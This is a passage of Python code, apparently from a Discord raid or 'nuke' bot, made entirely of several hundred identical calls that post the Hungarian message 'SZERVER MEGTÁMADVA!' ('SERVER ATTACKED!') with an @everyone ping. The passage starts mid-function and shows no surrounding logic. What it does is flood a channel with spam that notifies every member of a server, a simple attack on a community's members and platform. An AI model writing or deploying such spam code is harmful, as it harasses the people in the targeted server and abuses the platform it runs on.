        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
        await ctx.send("SZERVER MEGTÁMADVA! ( @everyone )")
